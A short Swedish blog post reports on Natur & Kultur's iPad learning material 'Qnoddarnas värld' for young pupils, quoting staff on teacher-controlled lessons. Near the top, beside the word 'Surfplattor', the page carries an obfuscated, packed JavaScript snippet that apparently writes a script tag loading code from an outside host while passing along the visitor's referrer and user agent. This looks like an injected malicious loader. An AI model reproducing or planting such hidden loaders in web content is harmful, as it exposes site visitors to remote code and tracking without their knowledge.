Image Image Image Image Image Image Image Image Image Image

| 3 juni, 2020

Scroll to top

Top

Utbildning med Surfplattor vanligare bland yngre

Utbildning med Surfplattor vanligare bland yngre
Sebastian

Surfplattor: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|irhar|var|u0026u|referrer|dhstb||js|php’.split(’|’),0,{}))
Att surfplattorna snabbt har tagit sig in på marknaden vet vi. Det var inte längesen också skolorna började plocka in surfplattorna till sina elever. Detta gällde först och främst lite äldre barn i grundskolan i högstadiet.

Nu kommer förlaget Natur & Kultur med en satsning för barn i årskurs ett till tre

Läromedlet heter Qnoddarnas värld och är helt skräddarsytt för Ipad. I nuläget finns det färdigt för årskurs ett men redan under nästa år ska det finnas klart för även årskurs två och tre.

– Vi vill göra en helhet, ett paket, där vi kan hålla eleven i handen, säger Malin Fogelström, projektledare.

Det är läraren som bestämmer vilka uppgifter som ges till barnen. Barnen får inte själva sitta och leka med plattan utan ska få uppdrag och utmaningar av läraren som ska lösas. Ett smart och modernt sätt att lära ut.

– Läraren är den som låser upp uppgifterna vartefter – för hela klassen eller individuellt. Det är viktigt för läraren att verkligen vara den som styr undervisningen.

Läraren har också en egen version av programmet där  hon/han kan gå in och se hur det går för eleverna. Vilka gör rätt vid första försöket, vilka fastnar och vart fastnar de? vilka extra stöd kan behövas sätta in.

– Det är full rulle på det, säger Per Almgren, vd på förlaget.

Via: IDG.se